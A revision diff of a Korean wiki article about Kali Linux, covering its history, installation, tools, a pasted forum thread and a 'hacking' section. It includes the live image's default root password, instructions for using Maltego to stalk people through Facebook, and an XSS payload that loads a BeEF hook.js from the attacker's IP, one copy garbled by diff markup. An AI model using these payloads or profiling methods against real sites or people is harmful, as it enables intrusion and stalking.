565
edits
(→참조) |
|||
Line 22: | Line 22: | ||
'''칼리 리눅스'''(Kali Linux)는 정보 보안을 테스트하기 위한 [[오픈 소스]] [[리눅스]] 배포판인 [[백트랙 (운영 체제)|백트랙]]의 후속버전이다. | '''칼리 리눅스'''(Kali Linux)는 정보 보안을 테스트하기 위한 [[오픈 소스]] [[리눅스]] 배포판인 [[백트랙 (운영 체제)|백트랙]]의 후속버전이다.<ref>{{웹 인용|제목=The Birth of Kali Linux|url=http://www.kali.org/news/birth-of-kali/|publisher=Offensive Security|accessdate=13 March 2013|date=12|month=12|year=2012}}</ref> 이 안에는 [[백트랙 (운영 체제)|백트랙]]처럼 수많은 [[해킹]]과 관련된 도구와 설명서들이 있다. 흥미로운 점은 [[백트랙 (운영 체제)|백트랙]]은 [[우분투 (운영 체제)|우분투]]를 기반으로 했다면, 칼리 리눅스는 [[데비안]]을 기반으로 만들었다는 것이다. 칼리 리눅스는 칼리 리눅스 공식 사이트에서 [[ISO 이미지]] 파일 또는 토렌트 등을 이용하여 무료로 [[다운로드]]가 가능하다.<ref>{{웹 인용|제목=Official Kali Linux Downloads|url=https://www.kali.org/downloads/}}</ref> | ||
* #11098 2019-4-21 오전 1:39 [삭제] | |||
해커들은 전부 칼리 리눅스 쓰는게 정설?? 이게 좋은점이 뭔데? | |||
1: 쓸데없는 드라이버 같은거 없이 해킹툴 잔뜩 모아져있는 리눅스 버전. 해커들도 뭐 간단한 것들은 굳이 다시 코딩할 필요없게 해주니까 칼리 리눅스 같은거 쓰겠지. 그렇다고 칼리 리눅스에 깔린 프로그램 가지고만 놀면 해커가 아니라 스크립트 키디지 뭐. [삭제] 2019-4-21 오전 1:54 | |||
2: >1 그 버전은 어디서 구함? 여러가지 깔기 귀찮아서 그런데.. [삭제] 2019-4-21 오후 6:35 | |||
3: >2 google -> kali linux -> x64 image download -> Live boot or Install [삭제] 2019-4-21 오후 8:18 | |||
4: >2 구글에 칼리리눅스 다운로드라고 쳐라 [삭제] 2019-4-21 오후 8:22 | |||
5: >2 그 버전이 아니라 칼리 리눅스가 해킹툴 모아놓은 리눅스 버전이라고. 설치 해보면 무슨 말인지 알것임 [삭제] 2019-4-21 오후 11:39 | |||
6: >5 친절한 형님은 ㅇㅂ야 !! [삭제] 2019-4-22 오전 1:36 | |||
7: 그 해킹 툴들 중에 실제로 쓰는 건 몇 개 없어서 그냥 자기가 좋아하는 리눅스 배포판에 자기가 쓰는 툴 몇 개만 깔아서 씀 [삭제] 2019-4-22 오전 2:40 | |||
http://jqu6my2mlqp4zuui.onion/p?id=11098 | |||
== 버전 == | == 버전 == | ||
Line 45: | Line 71: | ||
디스크 파티션하기: 수동으로. 역시 [[리눅스]] 문서 참조. | 디스크 파티션하기: 수동으로. 역시 [[리눅스]] 문서 참조. | ||
=== USB 메모리 설치와 라이브 운영 체제 === | |||
CD나 DVD 대신에 USB 메모리로 설치 디스크를 만들 수 있다. [[Rufus]]( https://rufus.akeo.ie/ )같은 소프트웨어를 사용하여 iso 이미지로 부팅 가능한 USB 메모리를 만들 수 있다. 하지만 Rufus를 써도 설치하지 않고 쓸 수 있는 라이브 [[운영 체제]](live OS)로는 사용 가능하지만 막상 설치하려고 하면 CD 장치를 찾을 수 없다는 오류 메시지가 뜨면서 설치가 안 된다. 칼리 리눅스 운영진이 꼰대라 요즘에는 운영 체제를 USB로 설치한다는 사실을 모르는 모양이다. | |||
Live DVD로 부팅했을 경우 10분 정도 작업을 안 하면 화면 보호기가 뜨고 다시 돌아가려면 root의 비밀번호를 쳐야 하는데 칼리 리눅스의 Live DVD의 기본 설정된 root 비밀 번호는 toor 이다. | |||
== 업그레이드 방법 == | == 업그레이드 방법 == | ||
Line 125: | Line 156: | ||
== [[해킹]] == | == [[해킹]] == | ||
* [[SQL | * [[리눅스 마스터]] | ||
* [[ | * [[정보보안기사]] | ||
* [[SQL 주입]]([[SQL injection]]) | |||
* [[싸이트 간 스크맆팅]]([[cross-site scripting]], [[XSS]], [[CSS]]) | |||
* [[싸이트 간 요청 위조]]([[cross-site request forgery]], [[CSRF]], [[XSRF]]) | |||
== 사용 방법 == | == 사용 방법 == | ||
Line 165: | Line 198: | ||
명령어로 사용 할 수 있다. | 명령어로 사용 할 수 있다. | ||
http://blog.naver.com/PostView.nhn?blogId=pjy9954&logNo=70135379290 | http://blog.naver.com/PostView.nhn?blogId=pjy9954&logNo=70135379290 | ||
Line 174: | Line 207: | ||
Armitage 은 바로 metasploit의 GUI 버전이라고 생각하시면 되요. | Armitage 은 바로 metasploit의 GUI 버전이라고 생각하시면 되요. | ||
http://blog.naver.com/PostView.nhn?blogId=onyourlife&logNo=150119487167&redirect=Dlog&widgetTypeCall=true | http://blog.naver.com/PostView.nhn?blogId=onyourlife&logNo=150119487167&redirect=Dlog&widgetTypeCall=true | ||
Line 214: | Line 247: | ||
Maltego는 데이타 수집을 목적으로 하는 서버/클라이언트 아키텍쳐를 사용하는데 실제 전 세계에 흩어져 있는 인터넷 상에 존재하는, 예를 들어 사람, 온라인 그룹(SNS와 같은), 그 사람이 속한 회사나 조직, 웹사이트, 인터넷 인프라(도메인, DNS 네임, Netblock, IP주소 와 같은)에 돌아다니는 데이타의 조각들 간의 관계를 수집하여 분석을 한다. | Maltego는 데이타 수집을 목적으로 하는 서버/클라이언트 아키텍쳐를 사용하는데 실제 전 세계에 흩어져 있는 인터넷 상에 존재하는, 예를 들어 사람, 온라인 그룹(SNS와 같은), 그 사람이 속한 회사나 조직, 웹사이트, 인터넷 인프라(도메인, DNS 네임, Netblock, IP주소 와 같은)에 돌아다니는 데이타의 조각들 간의 관계를 수집하여 분석을 한다. | ||
http://blog.naver.com/PostView.nhn?blogId=chogar&logNo=80210957759&redirect=Dlog&widgetTypeCall=true | http://blog.naver.com/PostView.nhn?blogId=chogar&logNo=80210957759&redirect=Dlog&widgetTypeCall=true | ||
* 모의해킹 전문가에 관해서 궁금한것들이 있습니다. 2014/11/06 | * 모의해킹 전문가에 관해서 궁금한것들이 있습니다. 2014/11/06 | ||
http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Board&no=32972 | http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Board&no=32972 | ||
Line 242: | Line 275: | ||
특히 페이스북의 공개된 신상정보 스토킹을 잘 하는듯 하다. | 특히 페이스북의 공개된 신상정보 스토킹을 잘 하는듯 하다. | ||
<del>당신네 [[스크립트 키디]]들이 가장 좋아하는</del> [[페이스북]] [[스토킹]]을 하고싶다면 왼쪽 패널 리스트에서 Social Networking탭을 선택한 후 Facebook Affiliation을 끌어온 후, 프로필 주소와 이름을 적고 Transform을 시행하면 많은것들이 튀어나온다. | |||
http://blog.naver.com/PostView.nhn?blogId=namjmnam&logNo=20205975010&redirect=Dlog&widgetTypeCall=true | http://blog.naver.com/PostView.nhn?blogId=namjmnam&logNo=20205975010&redirect=Dlog&widgetTypeCall=true | ||
Line 259: | Line 292: | ||
vi 에디터등의 편집기를 이용하여, config.yaml 파일을 보면 가장 아랫 부분에 확장 모듈을 활성화/비활성화를 설정하는 부분이 나타난다. 여기서 메타스플로잇을 아래와 같이 enable: false을 enable: true로 변경 후 변경값을 저장한다. | vi 에디터등의 편집기를 이용하여, config.yaml 파일을 보면 가장 아랫 부분에 확장 모듈을 활성화/비활성화를 설정하는 부분이 나타난다. 여기서 메타스플로잇을 아래와 같이 enable: false을 enable: true로 변경 후 변경값을 저장한다. | ||
http://blog.naver.com/PostView.nhn?blogId=chogar&logNo=220000745475&redirect=Dlog&widgetTypeCall=true | http://blog.naver.com/PostView.nhn?blogId=chogar&logNo=220000745475&redirect=Dlog&widgetTypeCall=true | ||
Line 265: | Line 298: | ||
워드프레스 플러그인 내 XSS 취약점을 이용하여 Beef Framework를 통해 관리자PC를 장악하자. | 워드프레스 플러그인 내 XSS 취약점을 이용하여 Beef Framework를 통해 관리자PC를 장악하자. | ||
http://blog.naver.com/PostView.nhn?blogId=chogar&logNo=220436811312&redirect=Dlog&widgetTypeCall=true | http://blog.naver.com/PostView.nhn?blogId=chogar&logNo=220436811312&redirect=Dlog&widgetTypeCall=true | ||
Line 278: | Line 311: | ||
대충 이렇게 생겼다: | 대충 이렇게 생겼다: | ||
<script src=자바스크립트.js></script> | |||
이걸 어떻게 넣어서 실행할 수 있게 만들면 "자바스크립트.js"가 실행된다. | 이걸 어떻게 넣어서 실행할 수 있게 만들면 "자바스크립트.js"가 실행된다. | ||
Line 293: | Line 326: | ||
그럼 이 일이 가능하다: | 그럼 이 일이 가능하다: | ||
<script src=</script>">http://내아이피:3000/hook.js></script> | |||
여기서 hook.js 파일은 [[BeEF]] 웹 설정에서 알아서 정할 수 있다. | 여기서 hook.js 파일은 [[BeEF]] 웹 설정에서 알아서 정할 수 있다. | ||
Line 324: | Line 357: | ||
== 관련 항목 == | == 관련 항목 == | ||
* [[10만 스키디 양병설]] | * [[10만 스키디 양병설]] | ||
* [[다크넽]] | |||
* [[딮페이크]] | |||
== 외부 링크 == | == 외부 링크 == |
edits